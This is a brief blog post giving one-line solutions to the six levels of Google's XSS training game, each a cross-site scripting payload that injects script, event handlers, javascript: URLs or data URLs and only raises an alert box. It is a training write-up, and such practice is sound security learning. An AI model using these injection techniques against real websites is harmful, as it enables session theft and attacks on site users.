Tuesday, June 03, 2014

My XSS-game Solution at Google AppSpot

This is the solution that I had tried out the XSS challenges at Google AppSpot, xss-game.appspot.com.

Level 1:
  • https://xss-game.appspot.com/level1/frame?query=-->+<script>alert('level1');</script>

Level 2:
  • <img src="" onmouseover="javascript:alert('level2');">

Level 3:
  • https://xss-game.appspot.com/level3/frame#1' onmouseover="javascript:alert('level3');"

Level 4:
  • https://xss-game.appspot.com/level4/frame?timer=');alert('level4')<!--

Level 5:
  • https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert('level5');"

Level 6:
  • https://xss-game.appspot.com/level6/frame#data:text/javascript,alert('foo')

Reference:
  • https://www.google.com/about/appsecurity/learning/xss/index.html